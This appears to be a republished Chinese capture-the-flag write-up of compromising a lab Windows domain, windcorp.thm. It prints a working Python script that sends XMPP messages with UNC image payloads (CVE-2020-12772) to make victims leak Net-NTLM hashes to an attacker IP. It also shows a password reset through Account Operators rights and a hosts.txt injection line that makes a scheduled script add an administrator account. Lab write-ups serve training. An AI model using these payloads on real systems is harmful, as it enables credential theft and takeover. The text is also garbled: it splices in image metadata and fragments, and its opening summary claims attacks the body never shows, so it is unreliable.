文章总结: 本文详细记录了针对WindCorp公司的内网渗透实战过程,通过外网端口扫描发现域控制器FIRE,利用Kerberoasting攻击获取服务账户哈希并破解,获得域内初始访问权限后使用BloodHound进行域关系分析,最终通过DCSync攻击成功获取域管理员权限,完整演示了从外网入口到完全控制内网的技术链条。 综合评分: 85 文章分类: 内网渗透,红队,实战经验,漏洞分析,安全工具
Quality : 100%
XMP Toolkit : Adobe XMP Core 5.6-c140 79.160451, 2017/05/06-01:08:21
Document ID : xmp.did:40EA1AF4C1AE11E79FC6E0171011BB04
Instance ID : xmp.iid:40EA1AF3C1AE11E79FC6E0171011BB04
Creator Tool : Adobe Photoshop CC 2018 Macintosh
Derived From Instance ID : FE476206473385EE66A5CAE4D87F419C
Derived From Document ID : FE476206473385EE66A5CAE4D87F419C
DCT Encode Version : 100
APP14 Flags 0 : [14], Encoded with Blend=1 downsampling
APP14 Flags 1 : (none)
Color Transform : YCbCr
Image Width : 500
Image Height : 500
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:4:4 (1 1)
Image Size : 500x500
Megapixels : 0.250
apple@macos tryhackme % strings Emilieje.jpg | tail -n 30
sL%a
2wS`
Aqp
^$xq
<W-:
Za1X
$N-X
W/es
\yW){kind=icon}
好吧没有…..
重新打开网站观察一下
的恶意 UNC 路径。
- 攻击者通过内网或聊天群聊,向目标受害者发送一条包含恶意 UNC 路径(指向攻击者控制的内网主机)的消息或图片链接。
- 当受害者的 Spark 2.8.3 客户端尝试去加载或渲染这个图片时,Windows 操作系统会自动发起 SMB 请求。
- 在这个过程中,受害者计算机会自动向攻击者的机器发送当前 Windows 登录用户的 Net-NTLM Hash。
漏洞参考链接:https://github.com/theart42/cves/blob/master/cve-2020-12772/CVE-2020-12772.md
成功获得第一个 flag,继续横向突破
apple@macos security % smbclient //10.48.129.160/Users -U 'lilyle%ChangeMe#1234' -W windcorp.thm
Can't load /opt/homebrew/etc/smb.conf - run testparm to debug it
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Sun May 3 06:05:58 2020
.. DR 0 Sun May 3 06:05:58 2020
Administrator D 0 Sun May 10 19:18:11 2020
All Users DHSrn 0 Sat Sep 15 15:28:48 2018
angrybird D 0 Fri May 1 20:59:20 2020
berg D 0 Fri May 1 20:59:20 2020
bluefrog579 D 0 Fri May 1 20:59:20 2020
brittanycr D 0 Sun May 3 07:36:46 2020
brownostrich284 D 0 Fri May 1 20:59:20 2020
buse D 0 Tue May 19 20:15:06 2026
Default DHR 0 Fri May 1 07:35:11 2020
Default User DHSrn 0 Sat Sep 15 15:28:48 2018
desktop.ini AHS 174 Sat Sep 15 15:16:48 2018
edward D 0 Fri May 1 20:59:20 2020
freddy D 0 Sun May 3 07:30:16 2020
garys D 0 Fri May 1 20:59:20 2020
goldencat416 D 0 Tue May 19 21:46:06 2026
goldenwol D 0 Fri May 1 20:59:20 2020
happ D 0 Fri May 1 20:59:20 2020
happyme D 0 Fri May 1 20:59:20 2020
Luis D 0 Fri May 1 20:59:20 2020
orga D 0 Fri May 1 20:59:20 2020
organicf D 0 Fri May 1 20:59:20 2020
organicfish718 D 0 Tue May 19 21:41:59 2026
pete D 0 Fri May 1 20:59:20 2020
Public DR 0 Thu Apr 30 22:35:47 2020
purplecat D 0 Fri May 1 20:59:20 2020
purplepanda D 0 Fri May 1 20:59:20 2020
sadswan D 0 Fri May 1 20:59:20 2020
sadswan869 D 0 Tue May 19 21:41:23 2026
sheela D 0 Fri May 1 20:59:20 2020
silver D 0 Fri May 1 20:59:20 2020
smallf D 0 Fri May 1 20:59:20 2020
spiff D 0 Fri May 1 20:59:20 2020
tinygoos D 0 Fri May 1 20:59:20 2020
whiteleopard D 0 Fri May 1 20:59:20 2020
15587583 blocks of size 4096. 10795723 blocks available
smb: \>
buse D 0 Tue May 19 20:15:06 2026
这个时间很新,一般靶场文件都会比较久,在内网中如果一个用户、文件夹、文件动作频率很高的话,那应该是要考核NTLM 那些东西了。
访问 buse
smb: \> cd buse
smb: \buse\> ls
NT_STATUS_ACCESS_DENIED listing \buse\*
smb: \buse\>
ACL(访问控制列表)限制, NT_STATUS_ACCESS_DENIED。
试了其他几个用户也全部限制
那就试试CVE-2020-12772
攻击路线
[ 攻击者 (Lilyle) ]
│
│ 1. 发送聊天消息: <img src="\\攻击者IP\share\test.jpg"> (XMPP Port 5222)
▼
[ Openfire 服务器 ]
│
│ 2. 路由并转发消息给目标用户
▼
[ 受害者客户端 (Spark 2.8.3) ]
│
│ 3. 强行解析 HTML 富文本,向底层 Windows 递交 UNC 路径
▼
[ 受害者 Windows 系统 ]
│
│ 4. 触发 SSO 机制,自动通过 SMB 发起网络认证 (SMB Port 445)
▼
[ 攻击者拦截器 (Responder) ] ───► [ 成功截获受害者的 Net-NTLMv2 Hash! ]
OK~
先准备个小脚本:
import socket
import base64
import time
def send_spark_exploit():
# ----------------- 1. 配置基础信息 -----------------
TARGET_IP = "10.48.129.160"
TARGET_PORT = 5222
DOMAIN = "windcorp.thm"
USERNAME = "lilyle"
PASSWORD = "ChangeMe#1234"
# 扩大打击面:将靶场中所有可能值班的轮询 Bot 全部加入群发名单
TARGET_USERS = ["buse", "goldencat416", "organicfish718"]
# 你的 Mac 在 utun4 上的真实 VPN IP
YOUR_ATTACKER_IP = "192.168.132.34"
# 升级版 Payload:加入标准的 HTML 闭合标签,确保更完美的客户端富文本渲染
PAYLOAD = f'<html><body><img src="\\\\{YOUR_ATTACKER_IP}\\share\\test.jpg" /></body></html>'
# ----------------- 2. 循环群发诱饵 -----------------
for user in TARGET_USERS:
print(f"\n[*] --------------------------------------------------")
print(f"[*] 正在尝试连接 Openfire 发射信道 -> 目标: {user} ...")
# 建立原生 TCP 链接
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((TARGET_IP, TARGET_PORT))
def recv_data():
time.sleep(0.3)
return s.recv(4096).decode('utf-8', errors='ignore')
# --- XMPP 协议纯手工握手 ---
# Step 1: 初始化 XMPP 流
init_stream = f'<stream:stream to="{DOMAIN}" xmlns="jabber:client" xmlns:stream="http://etherx.jabber.org/streams" version="1.0">'
s.send(init_stream.encode())
recv_data()
# Step 2: 发送 PLAIN 明文认证请求
auth_str = f"\x00{USERNAME}\x00{PASSWORD}"
auth_base64 = base64.b64encode(auth_str.encode()).decode()
auth_packet = f'<auth xmlns="urn:ietf:params:xml:ns:xmpp-sasl" mechanism="PLAIN">{auth_base64}</auth>'
s.send(auth_packet.encode())
recv_data()
# Step 3: 认证成功后根据协议重新开流
s.send(init_stream.encode())
recv_data()
# Step 4: 绑定资源标识
bind_packet = '<iq type="set" id="b1"><bind xmlns="urn:ietf:params:xml:ns:xmpp-bind"><resource>Spark</resource></bind></iq>'
s.send(bind_packet.encode())
recv_data()
# Step 5: 宣告上线状态
s.send('<presence/>'.encode())
recv_data()
# --- 致命一击:发射富文本注入 Payload ---
print(f"[+] 身份验证成功!正在向 {user} 发送强制认证诱饵...")
msg_packet = f'<message to="{user}@{DOMAIN}" type="chat" id="exp"><body>{PAYLOAD}</body></message>'
s.send(msg_packet.encode())
time.sleep(0.5)
print(f"[+] 针对 {user} 的诱饵发送完毕。")
s.close()
except Exception as e:
print(f"[-] 连接或发送失败 (目标 {user}): {e}")
print("\n" + "="*50)
print("[+] 所有目标诱饵发射完毕!请立刻死死盯住 Responder 窗口!")
print("="*50 + "\n")
if __name__ == '__main__':
send_spark_exploit()
虽然脚本问题还挺多,不过 Gemini 回答还挺可爱,至少情绪价值给足 小 ps:
apple@macos tryhackme % evil-winrm -i windcorp.thm -u buse -p 'uzunLM+3131'
获得第二个flag
</code></pre>
<h2 id=)
拿下域控:
*Evil-WinRM* PS C:\Users\buse\Desktop> whoami /all
USER INFORMATION
----------------
User Name SID
============= ============================================
windcorp\buse S-1-5-21-555431066-3599073733-176599750-5777
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============================================ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Account Operators Alias S-1-5-32-548 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Desktop Users Alias S-1-5-32-555 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
WINDCORP\IT Group S-1-5-21-555431066-3599073733-176599750-5865 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
*Evil-WinRM* PS C:\Users\buse\Desktop>
Account Operators (账户操作员),这意味着我们可以修改所有账户,除了管理员账户。
在C:\scripts 下发现两个文件
*Evil-WinRM* PS C:\scripts> ls
Directory: C:\scripts
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/3/2020 5:53 AM 4119 checkservers.ps1
-a---- 5/19/2026 9:01 AM 31 log.txt
*Evil-WinRM* PS C:\scripts>
checkservers 检查服务器
*Evil-WinRM* PS C:\scripts> type checkservers.ps1
# reset the lists of hosts prior to looping
$OutageHosts = $Null
# specify the time you want email notifications resent for hosts that are down
$EmailTimeOut = 30
# specify the time you want to cycle through your host lists.
$SleepTimeOut = 45
# specify the maximum hosts that can be down before the script is aborted
$MaxOutageCount = 10
# specify who gets notified
$notificationto = "[email protected]"
# specify where the notifications come from
$notificationfrom = "[email protected]"
# specify the SMTP server
$smtpserver = "relay.windcorp.thm"
# start looping here
Do{
$available = $Null
$notavailable = $Null
Write-Host (Get-Date)
# Read the File with the Hosts every cycle, this way to can add/remove hosts
# from the list without touching the script/scheduled task,
# also hash/comment (#) out any hosts that are going for maintenance or are down.
get-content C:\Users\brittanycr\hosts.txt | Where-Object {!($_ -match "#")} |
ForEach-Object {
$p = "Test-Connection -ComputerName $_ -Count 1 -ea silentlycontinue"
Invoke-Expression $p
if($p)
{
# if the Host is available then just write it to the screen
write-host "Available host ---> "$_ -BackgroundColor Green -ForegroundColor White
[Array]$available += $_
}
else
{
# If the host is unavailable, give a warning to screen
write-host "Unavailable host ------------> "$_ -BackgroundColor Magenta -ForegroundColor White
$p = Test-Connection -ComputerName $_ -Count 1 -ea silentlycontinue
if(!($p))
{
# If the host is still unavailable for 4 full pings, write error and send email
write-host "Unavailable host ------------> "$_ -BackgroundColor Red -ForegroundColor White
[Array]$notavailable += $_
if ($OutageHosts -ne $Null)
{
if (!$OutageHosts.ContainsKey($_))
{
# First time down add to the list and send email
Write-Host "$_ Is not in the OutageHosts list, first time down"
$OutageHosts.Add($_,(get-date))
$Now = Get-date
$Body = "$_ has not responded for 5 pings at $Now"
Send-MailMessage -Body "$body" -to $notificationto -from $notificationfrom `
-Subject "Host $_ is down" -SmtpServer $smtpserver
}
else
{
# If the host is in the list do nothing for 1 hour and then remove from the list.
Write-Host "$_ Is in the OutageHosts list"
if (((Get-Date) - $OutageHosts.Item($_)).TotalMinutes -gt $EmailTimeOut)
{$OutageHosts.Remove($_)}
}
}
else
{
# First time down create the list and send email
Write-Host "Adding $_ to OutageHosts."
$OutageHosts = @{$_=(get-date)}
$Body = "$_ has not responded for 5 pings at $Now"
Send-MailMessage -Body "$body" -to $notificationto -from $notificationfrom `
-Subject "Host $_ is down" -SmtpServer $smtpserver
}
}
}
}
# Report to screen the details
$log = "Last run: $(Get-Date)"
write-host $log
Set-Content -Path C:\scripts\log.txt -Value $log
Write-Host "Available count:"$available.count
Write-Host "Not available count:"$notavailable.count
Write-Host "Not available hosts:"
$OutageHosts
Write-Host ""
Write-Host "Sleeping $SleepTimeOut seconds"
sleep $SleepTimeOut
if ($OutageHosts.Count -gt $MaxOutageCount)
{
# If there are more than a certain number of host down in an hour abort the script.
$Exit = $True
$body = $OutageHosts | Out-String
Send-MailMessage -Body "$body" -to $notificationto -from $notificationfrom `
-Subject "More than $MaxOutageCount Hosts down, monitoring aborted" -SmtpServer $smtpServer
}
}
while ($Exit -ne $True)
*Evil-WinRM* PS C:\scripts> type"C:/scripts/log.txt"
Last run: 05/19/2026 09:03:23
*Evil-WinRM* PS C:\scripts>
注意这一段:
$p = "Test-Connection -ComputerName $_ -Count 1 -ea silentlycontinue"
Invoke-Expression $p
- 它读取的是
C:\Users\brittanycr\hosts.txt。brittanycr这个用户可以通过Account Operators权限重置她的密码并登录,可以完全控制**hosts.txt**的内容。 - 代码执行点: 脚本通过
get-content C:\Users\brittanycr\hosts.txt循环读取主机名,并将其带入Invoke-Expression。如果在hosts.txt中写入恶意 PowerShell 命令(利用 PowerShell 的注入特性),脚本就会直接执行这些命令。
*Evil-WinRM* PS C:\scripts> net user brittanycr NewPassword123! /domain
The command completed successfully.
*Evil-WinRM* PS C:\scripts>
切换用户:
apple@macos tryhackme % evil-winrm -i windcorp.thm -u buse -p 'NewPassword123!'
winrm好像无法登录,改用策略
smbclient -U 'brittanycr' //windcorp.thm/Users
Can't load /opt/homebrew/etc/smb.conf - run testparm to debug it
Password for [WORKGROUP\brittanycr]:
Try "help" to get a list of possible commands.
smb: \brittanycr\> ls
. D 0 Sun May 3 07:36:46 2020
.. D 0 Sun May 3 07:36:46 2020
hosts.txt A 22 Sun May 3 21:44:57 2020
15587583 blocks of size 4096. 10788086 blocks available
smb: \brittanycr\>
在本地上创建恶意 hosts,上传替换原来的文件
;net user asunb sdcds45QAdwd2e /add;net localgroup Administrators asunb /add
尝试用新用户登录:
apple@macos tryhackme % nxc smb windcorp.thm -u asunb -p 'sdcds45QAdwd2e'
SMB 10.48.129.160 445 FIRE [*] Windows 10 / Server 2019 Build 17763 x64 (name:FIRE) (domain:windcorp.thm) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.48.129.160 445 FIRE [+] windcorp.thm\asuna:sdcds45QAdwd2e
apple@macos tryhackme % smbclient -U 'asunb' //windcorp.thm/Users
由于创建的是 administrator 组下的用户,可以直接去读 flag
得早点休息了,祝师傅们 520 节日快乐。
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:皇后红队 Asuna Asuna《【内网渗透】从域内凭据泄露到内网沦陷:Ra 靶场渗透全记录》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。
评论